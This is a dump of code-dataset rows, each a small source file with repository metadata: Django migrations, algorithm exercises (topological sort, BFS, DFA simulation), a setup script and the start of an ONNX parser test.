'sqrts (TeV)': 13.0, 'element': '[[[jet]],[[jet],[l,nu]]]'}, {'weight (fb)': 96.36675859548866, 'sqrts (TeV)': 13.0, 'element': '[[[jet]],[[jet],[l,nu],[l,nu]]]'}, {'weight (fb)': 86.6200993215025, 'sqrts (TeV)': 13.0, 'element': '[[[jet]],[[jet],[photon]]]'}, {'weight (fb)': 68.68906468596393, 'sqrts (TeV)': 13.0, 'element': '[[[jet]],[[jet],[nu,ta]]]'}], 'Asymmetric Branches': [{'weight (fb)': 532.9335789742406, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000002, 1000002], [1000002, 1000004], [1000004, 1000004]]}, {'weight (fb)': 172.3783326016151, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000001, 1000002], [1000001, 1000004], [1000002, 1000003], [1000003, 1000004]]}, {'weight (fb)': 90.56041427502541, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000001, 1000001], [1000001, 1000003], [1000003, 1000003]]}, {'weight (fb)': 64.90475182488875, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000002, 2000001], [1000002, 2000003], [1000004, 
2000001], [1000004, 2000003]]}, {'weight (fb)': 50.11555613127241, 'sqrts (TeV)': 13.0, 'mother PIDs': [[2000001, 2000001], [2000001, 2000003], [2000003, 2000003]]}, {'weight (fb)': 18.454477729999994, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000022, 1000024]]}, {'weight (fb)': 17.826953089865842, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000023, 1000024]]}, {'weight (fb)': 12.383551689803406, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000022, 1000023]]}, {'weight (fb)': 11.485848817914249, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000022, 2000001], [1000022, 2000003]]}, {'weight (fb)': 10.472686420984749, 'sqrts (TeV)': 13.0, 'mother PIDs': [[1000024, 1000024]]}], 'Outside Grid': [{'weight (fb)': 88.48133368234193, 'sqrts (TeV)': 13.0, 'element': '[[[jet]],[[jet]]]'}, {'weight (fb)': 1.8492721985478566, 'sqrts (TeV)': 13.0, 'element': '[[[b],[jet,jet]],[[b],[l,nu]]]'}, {'weight (fb)': 1.028127629776797, 'sqrts (TeV)': 13.0, 'element': '[[[l,nu]],[[l,nu]]]'}, {'weight (fb)': 0.9124591650782516, 'sqrts (TeV)': 13.0, 'element': '[[[b],[jet,jet]],[[b],[nu,ta]]]'}, {'weight (fb)': 0.7673101098593308, 'sqrts (TeV)': 13.0, 'element': '[[[jet]],[[jet,jet]]]'}, {'weight (fb)': 0.5315720611960791, 'sqrts (TeV)': 13.0, 'element': '[[[l,l]],[[l,nu]]]'}, {'weight (fb)': 0.30837059437025616, 'sqrts (TeV)': 13.0, 'element': '[[[b],[l,nu]],[[b],[l,nu]]]'}, {'weight (fb)': 0.3043095281427132, 'sqrts (TeV)': 13.0, 'element': '[[[b],[l,nu]],[[b],[nu,ta]]]'}, {'weight (fb)': 0.20401965403968503, 'sqrts (TeV)': 13.0, 'element': '[[[jet],[photon]],[[jet],[photon]]]'}, {'weight (fb)': 0.07507548596482914, 'sqrts (TeV)': 13.0, 'element': '[[[b],[nu,ta]],[[b],[nu,ta]]]'}]} | [
"[email protected]"
] | |
6c2cf63addd9d3664eeabb0d446ac9beeed5c449 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_287/ch16_2020_03_21_00_14_52_868139.py | 94be6d91f54a3fead1d374afc0cf87ba1bac9fca | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 93 | py | f=float(input('conta:'))
# Add the 10% service charge. The original line read `f=f*1,1`, which builds
# the tuple (f*1, 1) -- the comma is a tuple separator, not a decimal point --
# and then crashes in str.format below; the intended factor is 1.1.
f = f * 1.1
print('Valor da conta com 10%:R$ {0:.2f}'.format(f))
| [
"[email protected]"
] | |
ee3473b10902f6c6c697639c370c76082fa54da6 | 06919b9fd117fce042375fbd51d7de6bb9ae14fc | /py/dcp/problems/graph/find_order.py | 65b844789e326bb2a11db792095d06afc91af167 | [
"MIT"
] | permissive | bmoretz/Daily-Coding-Problem | 0caf2465579e81996869ee3d2c13c9ad5f87aa8f | f79e062e9f6e7b18b7e95c071fbe71ad104affcb | refs/heads/master | 2022-12-07T15:41:06.498049 | 2021-11-18T19:45:19 | 2021-11-18T19:45:19 | 226,376,236 | 1 | 0 | MIT | 2022-11-22T09:20:23 | 2019-12-06T17:17:00 | C++ | UTF-8 | Python | false | false | 1,593 | py | '''Topological sort.
We are given a hashmap associating each courseId key with a list of courseId values, which tells us that the prerequisites of that
courseId are the listed courseIds. Return an ordering of courses such that we can complete the curriculum.
Return None if there is no such ordering.
For example, given the following prerequisites:
{
'CSC300' : ['CSC100', 'CSC200'],
'CSC200' : ['CSC100'],
'CSC100' : []
}
You should return ['CSC100', 'CSC200', 'CSC300'].
'''
from collections import deque, defaultdict
def find_order1(courses_to_prereqs: dict):
    """Return a topological ordering of the courses, or None if impossible.

    Kahn's algorithm: repeatedly take a course with no outstanding
    prerequisites and "unlock" its successors. If a cycle exists, some
    courses are never unlocked and None is returned.

    :param courses_to_prereqs: maps each courseId to the list of courseIds
        that must be completed before it.
    :return: list of courseIds in a valid completion order, or None.
    """
    # Outstanding-prerequisite count per course. Iterate the ORIGINAL lists
    # (deduplicated, order preserved via dict.fromkeys) rather than set()
    # copies, so the produced ordering is deterministic across runs; the
    # previous version iterated sets, whose order depends on the hash seed.
    remaining = {}
    prereq_to_courses = defaultdict(list)
    for course, prereqs in courses_to_prereqs.items():
        unique_prereqs = list(dict.fromkeys(prereqs))
        remaining[course] = len(unique_prereqs)
        for prereq in unique_prereqs:
            prereq_to_courses[prereq].append(course)

    # Start with every course that has no prerequisites at all.
    todo = deque(c for c, count in remaining.items() if count == 0)

    result = []
    while todo:
        course = todo.popleft()
        result.append(course)
        # Completing `course` removes it as an outstanding prerequisite of
        # each successor; a successor with none left becomes available.
        for successor in prereq_to_courses[course]:
            remaining[successor] -= 1
            if remaining[successor] == 0:
                todo.append(successor)

    # Courses still waiting on a prerequisite form at least one cycle
    # (or depend on a course that is missing from the input).
    if len(result) < len(courses_to_prereqs):
        return None
    return result
"[email protected]"
] | |
f7383bb07b5a685e539266485c37b94cae869f20 | 992b6058a66a6d7e05e21f620f356d1ebe347472 | /fluent_pages/migrations/0001_initial.py | bebe90e32b27fb10654917cc68d5847990affc35 | [
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] | permissive | masschallenge/django-fluent-pages | 5ffb47a6dc4d7333ccbef9973cea4e6cf79569fe | 8beb083d89fba935ef3bfeda8cacf566f28b1334 | refs/heads/master | 2021-07-15T14:27:46.078658 | 2015-11-12T16:52:00 | 2015-11-12T16:52:00 | 28,341,345 | 0 | 0 | NOASSERTION | 2021-03-24T18:53:09 | 2014-12-22T14:17:52 | Python | UTF-8 | Python | false | false | 9,911 | py | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """Initial South schema migration for the fluent_pages app.

    Creates the database tables for the UrlNode page tree and the
    PageLayout template registry.
    """

    def forwards(self, orm):
        """Apply the migration: create the 'UrlNode' and 'PageLayout' tables."""
        # Adding model 'UrlNode'
        db.create_table('fluent_pages_urlnode', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('polymorphic_ctype', self.gf('django.db.models.fields.related.ForeignKey')(related_name='polymorphic_fluent_pages.urlnode_set', null=True, to=orm['contenttypes.ContentType'])),
            ('title', self.gf('django.db.models.fields.CharField')(max_length=255)),
            ('slug', self.gf('django.db.models.fields.SlugField')(max_length=50, db_index=True)),
            ('parent', self.gf('mptt.fields.TreeForeignKey')(blank=True, related_name='children', null=True, to=orm['fluent_pages.UrlNode'])),
            ('parent_site', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['sites.Site'])),
            ('status', self.gf('django.db.models.fields.CharField')(default='d', max_length=1)),
            ('publication_date', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
            ('expire_date', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
            ('in_navigation', self.gf('django.db.models.fields.BooleanField')(default=True)),
            ('sort_order', self.gf('django.db.models.fields.IntegerField')(default=1)),
            ('override_url', self.gf('django.db.models.fields.CharField')(max_length=300, blank=True)),
            ('author', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
            ('creation_date', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
            ('modification_date', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
            ('_cached_url', self.gf('django.db.models.fields.CharField')(default='', max_length=300, db_index=True, blank=True)),
            # lft/rght/tree_id/level are the django-mptt tree bookkeeping
            # columns (the table also uses mptt's TreeForeignKey for parent).
            ('lft', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True)),
            ('rght', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True)),
            ('tree_id', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True)),
            ('level', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True)),
        ))
        db.send_create_signal('fluent_pages', ['UrlNode'])

        # Adding model 'PageLayout'
        db.create_table('fluent_pages_pagelayout', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('key', self.gf('django.db.models.fields.SlugField')(max_length=50, db_index=True)),
            ('title', self.gf('django.db.models.fields.CharField')(max_length=255)),
            # NOTE(review): the template search path is hard-coded to one
            # server's absolute directory -- confirm this is intended to be
            # baked into the migration for other deployments.
            ('template_path', self.gf('fluent_pages.models.fields.TemplateFilePathField')(path='/srv/www/webapps/edoburu.nl/edoburu_site/themes/edoburu/templates/', max_length=100, recursive=True, match='.*\\.html$')),
        ))
        db.send_create_signal('fluent_pages', ['PageLayout'])

    def backwards(self, orm):
        """Revert the migration: drop both tables again."""
        # Deleting model 'UrlNode'
        db.delete_table('fluent_pages_urlnode')

        # Deleting model 'PageLayout'
        db.delete_table('fluent_pages_pagelayout')

    # Frozen model definitions: South reads this snapshot (not the live
    # models) when running the migration.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'fluent_pages.pagelayout': {
            'Meta': {'ordering': "('title',)", 'object_name': 'PageLayout'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'key': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
            'template_path': ('fluent_pages.models.fields.TemplateFilePathField', [], {'path': "'/srv/www/webapps/edoburu.nl/edoburu_site/themes/edoburu/templates/'", 'max_length': '100', 'recursive': 'True', 'match': "'.*\\\\.html$'"}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
        },
        'fluent_pages.urlnode': {
            'Meta': {'ordering': "('lft', 'sort_order', 'title')", 'object_name': 'UrlNode'},
            '_cached_url': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '300', 'db_index': 'True', 'blank': 'True'}),
            'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
            'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'expire_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'in_navigation': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'modification_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'override_url': ('django.db.models.fields.CharField', [], {'max_length': '300', 'blank': 'True'}),
            'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['fluent_pages.UrlNode']"}),
            'parent_site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
            'polymorphic_ctype': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'polymorphic_fluent_pages.urlnode_set'", 'null': 'True', 'to': "orm['contenttypes.ContentType']"}),
            'publication_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
            'sort_order': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
            'status': ('django.db.models.fields.CharField', [], {'default': "'d'", 'max_length': '1'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
        },
        'sites.site': {
            'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
            'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        }
    }

    # App(s) whose frozen models are included in the snapshot above.
    complete_apps = ['fluent_pages']
| [
"[email protected]"
] | |
b0ee96afdbb8d940aeeedbe2f8276662709cd207 | 09cead98874a64d55b9e5c84b369d3523c890442 | /py200913b_python2m8/day06_201018/filedir_4_remove.py | 0740189b7058ab68253a539e1376c26eddba0f08 | [] | no_license | edu-athensoft/stem1401python_student | f12b404d749286036a090e941c0268381ce558f8 | baad017d4cef2994855b008a756758d7b5e119ec | refs/heads/master | 2021-08-29T15:01:45.875136 | 2021-08-24T23:03:51 | 2021-08-24T23:03:51 | 210,029,080 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 128 | py | """
remove dir or file
remove(name)
"""
import os
# os.remove("mydir3a")
# remove a file
os.remove("rename_file_new.py")
| [
"[email protected]"
] | |
9e673189f7b3663b9f3c1004c0d52e8ed3aec3bb | 871c8b48a58b3e7dc7821e14bc451acb92dfe33e | /cms/migrations/0009_auto_20160308_1456.py | e5cf4eb94dfd3f19f01071c28af85f5df2715bea | [
"BSD-3-Clause"
] | permissive | sonsandco/djangocms2000 | 6f3937e2185707c32f15e5e42d06e138751d85e4 | 25131e9e8659a7a30a8fd58b7da011cbb928c8ac | refs/heads/master | 2022-08-25T22:18:17.173639 | 2022-08-17T11:36:36 | 2022-08-17T11:36:36 | 121,998,739 | 0 | 0 | NOASSERTION | 2022-07-24T05:16:48 | 2018-02-18T23:00:47 | Python | UTF-8 | Python | false | false | 1,935 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-03-08 01:56
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Schema migration for the cms app: adds Block.language, retunes several
    # existing column definitions, and extends the Block uniqueness
    # constraint to include the new language field.
    dependencies = [
        ('cms', '0008_auto_20150216_1649'),
    ]
    operations = [
        # New per-block language selector.
        # NOTE(review): the default 'en-us' is not one of the declared
        # choices ('en', 'ja', 'fr', 'es', 'pt') -- confirm this is
        # intentional before relying on choice validation.
        migrations.AddField(
            model_name='block',
            name='language',
            field=models.CharField(choices=[('en', 'English'), ('ja', 'Japanese'), ('fr', 'French'), ('es', 'Spanish'), ('pt', 'Portuguese')], default='en-us', max_length=5),
        ),
        # Allow empty content with an explicit '' default.
        migrations.AlterField(
            model_name='block',
            name='content',
            field=models.TextField(blank=True, default=''),
        ),
        migrations.AlterField(
            model_name='block',
            name='format',
            field=models.CharField(choices=[('attr', 'Attribute'), ('plain', 'Plain text'), ('html', 'HTML')], default='plain', max_length=10),
        ),
        migrations.AlterField(
            model_name='image',
            name='file',
            field=models.ImageField(blank=True, upload_to='cms/%y_%m'),
        ),
        migrations.AlterField(
            model_name='page',
            name='is_live',
            field=models.BooleanField(default=True, help_text='If this is not checked, the page will only be visible to logged-in users.'),
        ),
        migrations.AlterField(
            model_name='page',
            name='template',
            field=models.CharField(default='', max_length=255),
        ),
        migrations.AlterField(
            model_name='page',
            name='url',
            field=models.CharField(db_index=True, help_text='e.g. /about/contact', max_length=255, verbose_name='URL'),
        ),
        # A block label may now exist once per language, so language joins
        # the uniqueness constraint (must run after the AddField above).
        migrations.AlterUniqueTogether(
            name='block',
            unique_together=set([('content_type', 'object_id', 'language', 'label')]),
        ),
    ]
| [
"[email protected]"
] | |
7e96884df88998e1cd4b4b6f2f635021055b5322 | c317f99691f549b393562db200b1e9504ce11f95 | /algorithms_learn/what_can_be_computed/src/simulateDfa.py | efedb724f8a32d4de40d6a61ff15aa0d1e302d68 | [
"CC-BY-4.0"
] | permissive | RRisto/learning | 5349f9d3466150dbec0f4b287c13333b02845b11 | 618648f63a09bf946a50e896de8aed0f68b5144a | refs/heads/master | 2023-09-01T00:47:23.664697 | 2023-08-30T17:56:48 | 2023-08-30T17:56:48 | 102,286,332 | 15 | 24 | null | 2023-07-06T21:22:48 | 2017-09-03T18:42:58 | Jupyter Notebook | UTF-8 | Python | false | false | 1,135 | py | # SISO program simulateDfa.py
# Simulate a given dfa with a given input.
# dfaString: ASCII description of the dfa M to be simulated
# inString: the initial content I of M's tape
# returns: 'yes' if M accepts I and 'no' otherwise
# Example:
# >>> simulateDfa(rf('multipleOf5.dfa'), '3425735')
# 'yes'
import utils; from utils import rf; from turingMachine import TuringMachine
import re, sys; from dfa import Dfa
def simulateDfa(dfaString, inString):
    """Simulate the DFA described by *dfaString* on the input *inString*.

    Returns 'yes' if the machine accepts the input and 'no' otherwise.
    """
    machine = Dfa(dfaString)
    machine.reset(inString)
    return machine.run()
# see testCheckDfa() in checkTuringMachine.py for more detailed tests
def testSimulateDfa():
    # Smoke-test simulateDfa against known machine/input pairs.  Each tuple
    # is (dfa description file, input string, expected verdict).
    for (filename, inString, val) in [
        ('containsGAGA.dfa', 'CCCCCCCCCAAAAAA', 'no'),
        ('containsGAGA.dfa', 'CCCGAGACCAAAAAA', 'yes'),
        ('multipleOf5.dfa', '12345', 'yes'),
        ('multipleOf5.dfa', '1234560', 'yes'),
        ('multipleOf5.dfa', '123456', 'no'),
        ]:
        result = simulateDfa(rf(filename), inString)
        utils.tprint('filename:', filename, 'inString:', inString, 'result:', result)
        # Fail loudly if the simulated verdict differs from the expected one.
        assert val == result
| [
"[email protected]"
] | |
e92b6a0a8f15c772f6a3f238232ce0d47afa3a9f | ee87e89befa0d4bf353dcf682b6467f9daaf657e | /src/foo_ext/setup_foo.py | 00cab0b82444aae83ea486fa9f58bec6a8b7de40 | [
"BSD-3-Clause",
"MIT"
] | permissive | umedoblock/fugou | 43046056ce5f20b81d76e3c8e3149717b63708ed | 45d95f20bba6f85764fb686081098d92fc8cdb20 | refs/heads/master | 2021-07-15T15:26:30.856753 | 2018-11-26T23:44:18 | 2018-11-26T23:44:18 | 152,105,228 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 639 | py | from distutils.core import setup, Extension
# module_camellia = Extension('camellia', sources = ['camellia/pycamellia.c'])
# C extension module "_foo", built from the pyfoo.c wrapper source.
module_foo = \
    Extension('_foo',
              sources = ['foo/pyfoo.c'],
              extra_link_args=['-Wl,-soname,build/lib.linux-i686-3.2-pydebug/_foo.cpython-32dm.so'])
# build/lib.linux-i686-3.2-pydebug/_foo.cpython-32dm.so
#            extra_compile_args=[''])
# Package metadata for the distutils build.
# NOTE(review): distutils is deprecated (removed in Python 3.12); consider
# migrating this to setuptools the next time the package is touched.
setup( name = 'sample',
       version = '0.0',
       author = '梅濁酒(umedoblock)',
       author_email = '[email protected]',
       url = 'empty',
       description = 'This is a foo object package',
       ext_modules = [module_foo])
| [
"devnull@localhost"
] | devnull@localhost |
ff10aab701873a6743c66ff43a452b141e61b2e3 | d153c170a4839deb4d8606009be15198418aea69 | /알고리즘풀이/21.07.09/벽부수고이동.py | 9a0c96664f8cbc835b7ed167735d13703b0e7b60 | [] | no_license | rlatmd0829/algorithm | 669085907e2243b4c3a663feab87cd83ff50cc49 | 116bebf16afa6e20d9e968aa312b99b8eea447a5 | refs/heads/master | 2023-08-21T02:27:36.944919 | 2021-09-26T09:39:52 | 2021-09-26T09:39:52 | 345,480,784 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,533 | py | # 시간초과
import collections
# First attempt (times out on the judge): re-run a plain BFS once for every
# wall, temporarily removing that wall -- O(number_of_walls * N * M) overall.
n, m = map(int, input().split())
graph = [list(map(int,input())) for _ in range(n)]
# Neighbour offsets: up, down, left, right.
dx, dy = [-1,1,0,0], [0,0,-1,1]
def bfs():
    # Shortest-path BFS from (0, 0); a distance of 0 doubles as "unvisited".
    # NOTE(review): distance[0][0] stays 0, so the start cell can be
    # re-enqueued via its neighbours -- harmless for the result but wasteful.
    queue = collections.deque()
    queue.append((0,0))
    distance = [[0]*m for _ in range(n)]
    while queue:
        x, y = queue.popleft()
        for i in range(4):
            nx = x + dx[i]
            ny = y + dy[i]
            if 0 <= nx < n and 0 <= ny < m:
                if graph[nx][ny] == 0 and distance[nx][ny] == 0:
                    distance[nx][ny] = distance[x][y] + 1
                    queue.append((nx,ny))
    # 0 here means the goal cell was never reached.
    return distance[n-1][m-1]
result = []
for i in range(n):
    for j in range(m):
        if graph[i][j] == 1:
            # Knock this one wall down, re-run BFS, then restore it.
            graph[i][j] = 0
            demo = bfs()
            if demo != 0:
                result.append(demo)
            graph[i][j] = 1
if result:
    # distances above start at 0 on the origin; +1 converts to a cell count.
    print(min(result)+1)
else:
    print(-1)
##################
# Second attempt: a single BFS over (row, col, wall_broken) states, so each
# cell is visited at most twice (once per value of the "already broke a
# wall" flag).
from sys import stdin
from collections import deque

N, M = map(int, stdin.readline().split(" "))
# Bug fix: this list was previously bound to the name `map`, shadowing the
# builtin `map` used two lines above; renamed to `grid`.
grid = [list(map(int, stdin.readline().strip())) for _ in range(N)]

# Neighbour offsets for the four axis-aligned moves.
dx = [-1, 1, 0, 0]
dy = [0, 0, 1, -1]

curMin = 1000000

def bfs():
    global curMin
    # distances[r][c][b]: length of the shortest path to (r, c) having
    # broken b walls so far; -1 marks "not visited yet".
    distances = [[[-1] * 2 for _ in range(M)] for _ in range(N)]
    queue = deque()
    queue.append((0, 0, 0))
    distances[0][0][0] = 1
    while queue:
        x, y, broken = queue.popleft()
        for i in range(4):
            nx = x + dx[i]
            ny = y + dy[i]
            if 0 <= nx < N and 0 <= ny < M:
                # Case 1: step into an open cell without breaking anything.
                if grid[nx][ny] == 0 and distances[nx][ny][broken] == -1:
                    distances[nx][ny][broken] = distances[x][y][broken] + 1
                    queue.append((nx, ny, broken))
                # Case 2: break this wall -- only allowed if no wall has
                # been broken yet and the broken-state cell is unvisited.
                elif broken == 0 and grid[nx][ny] == 1 and distances[nx][ny][1] == -1:
                    distances[nx][ny][1] = distances[x][y][0] + 1
                    queue.append((nx, ny, 1))
    # Take the better of "reached without breaking" / "reached after one break".
    if distances[N-1][M-1][0] != -1:
        curMin = min(curMin, distances[N-1][M-1][0])
    if distances[N-1][M-1][1] != -1:
        curMin = min(curMin, distances[N-1][M-1][1])

bfs()
if curMin == 1000000:
    print(-1)
else:
    print(curMin)
"[email protected]"
] | |
6053712f6528d72f50dd12642f249150218a7d4c | 651a296c8f45b5799781fd78a6b5329effe702a0 | /bvec/bvec_print.py | a927d2db4dfdd041e9b0fa3dbdc83056ccf7b51a | [] | no_license | pdhhiep/Computation_using_Python | 095d14370fe1a01a192d7e44fcc81a52655f652b | 407ed29fddc267950e9860b8bbd1e038f0387c97 | refs/heads/master | 2021-05-29T12:35:12.630232 | 2015-06-27T01:05:17 | 2015-06-27T01:05:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,944 | py | #!/usr/bin/env python
def bvec_print ( n, bvec, title ) :

#*****************************************************************************80
#
## BVEC_PRINT prints a binary integer vector, with an optional title.
#
#  Discussion:
#
#    A BVEC is an integer vector of binary digits, intended to
#    represent an integer.  BVEC(0) is the units digit, and the vector
#    is printed "backwards": highest index first, 70 digits per row.
#
#  Licensing:
#
#    This code is distributed under the GNU LGPL license.
#
#  Author:
#
#    John Burkardt
#
#  Parameters:
#
#    Input, integer N, the number of components of the vector.
#
#    Input, integer BVEC(N), the vector to be printed.
#
#    Input, string TITLE, a title to be printed first.  TITLE may be blank.
#
  if ( 0 < len ( title ) ):
    print ( '' )
    print ( title )

  for ihi in range ( n - 1, -1, -70 ):
    ilo = max ( ihi - 70, -1 )
#
#  Bug fix: count DOWN from IHI to ILO with a step of -1.  The previous
#  code used range(ihi, -1, ilo), whose "step" of ilo produced an empty or
#  wrong inner range whenever N > 70.
#
    row = ' '
    for i in range ( ihi, ilo, -1 ):
      row = row + ' %1d' % ( bvec[i] )
    print ( row )

  return
def bvec_print_test ( ):

#*****************************************************************************80
#
## BVEC_PRINT_TEST tests BVEC_PRINT.
#
#  Discussion:
#
#    Exercises BVEC_PRINT on a fixed 10-digit example.
#    NOTE(review): the print statements below are Python 2 syntax; this
#    module will not import under Python 3 as written.
#
#  Licensing:
#
#    This code is distributed under the GNU LGPL license.
#
#  Modified:
#
#    24 December 2014
#
#  Author:
#
#    John Burkardt
#
  import numpy as np
  n = 10
  bvec = np.array ( [ 1, 0, 0, 1, 0, 1, 1, 1, 0, 0 ] )
  print ''
  print 'BVEC_PRINT_TEST'
  print '  BVEC_PRINT prints a binary vector.'
  bvec_print ( n, bvec, '  BVEC:' )
#
#  Report normal termination.
#
  print ''
  print 'BVEC_PRINT_TEST'
  print '  Normal end of execution.'
  return
if ( __name__ == '__main__' ):
  from timestamp import timestamp
  # Bracket the self-test between begin/end timestamps.
  timestamp ( )
  bvec_print_test ( )
  timestamp ( )
| [
"[email protected]"
] | |
1539d348092bab286434a5b073c5490382d7dffe | 9f4b1884273f995806c1e755665a92b785cc52a8 | /onnx/test/parser_test.py | 46604593e0c848bd177032dfeda4264980d26494 | [
"Apache-2.0"
] | permissive | zhijl/onnx | 340f7c5794a9aca96d2a9e76c3336aeebe798776 | ac0afea916f989c714692dd8551eff762a639cd5 | refs/heads/main | 2023-03-31T02:30:50.151799 | 2023-03-20T23:09:55 | 2023-03-20T23:09:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,295 | py | # SPDX-License-Identifier: Apache-2.0
import unittest
from parameterized import parameterized
import onnx
from onnx import GraphProto, OperatorSetIdProto, checker
class TestBasicFunctions(unittest.TestCase):
    """Tests for onnx.parser: parsing graphs, models and model-local
    functions from their textual representation."""

    def check_graph(self, graph: GraphProto) -> None:
        # Shared assertion: the parsed graph is the MatMul -> Add -> Softmax
        # three-node pipeline used by the fixtures below.
        self.assertEqual(len(graph.node), 3)
        self.assertEqual(graph.node[0].op_type, "MatMul")
        self.assertEqual(graph.node[1].op_type, "Add")
        self.assertEqual(graph.node[2].op_type, "Softmax")

    def test_parse_graph(self) -> None:
        # A bare graph (no model header) parses into a GraphProto.
        input = """
           agraph (float[N, 128] X, float[128,10] W, float[10] B) => (float[N] C)
           {
              T = MatMul(X, W)
              S = Add(T, B)
              C = Softmax(S)
           }
